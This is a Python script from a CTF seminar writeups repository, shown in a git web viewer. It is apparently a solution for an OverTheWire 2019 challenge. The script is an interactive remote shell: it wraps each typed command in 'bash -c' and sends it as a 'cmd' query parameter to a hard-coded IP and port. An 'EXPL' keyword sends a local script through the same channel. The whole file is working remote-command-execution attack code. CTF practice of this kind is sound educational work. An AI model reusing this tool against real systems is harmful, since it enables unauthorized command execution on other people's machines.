]> git.somenet.org - pub/jan/ctf-seminar.git/blob - writeups/litplus/otw19/24-shell.py
add otw-bonanza writeup
[pub/jan/ctf-seminar.git] / writeups / litplus / otw19 / 24-shell.py
1 #!/usr/bin/env python3
2 import sys
3 import requests
4 import requests.exceptions
5
6 script=""
7
8 while True:
9     print(" > ", end="", flush=True)
10     command=input()
11     worked=False
12     while not worked:
13         try:
14             if command == "EXPL":
15                 with open("24-proc.sh", "r") as file:
16                     script = "".join(file.readlines())
17                 command=script
18             escaped = command.replace("\n", " ").replace('"', '\\"').replace("$", "\\$")
19             full = 'bash -c "'+escaped+'" 2>&1'#+' ; echo \\"result -> $?\\""'
20             payload = { 'cmd': full}
21             print(full)
22             print(" ... ", end="\r", flush=True)
23             req = requests.get("http://3.93.128.89:1224/", params=payload, timeout=20)
24             print("     ", end="\r", flush=True)
25             print(req.text)
26             print("(done)")
27             worked=True
28         except requests.exceptions.ReadTimeout:
29             print("(timed out)")
30         except requests.exceptions.ConnectionError:
31             print("(connect error)")
32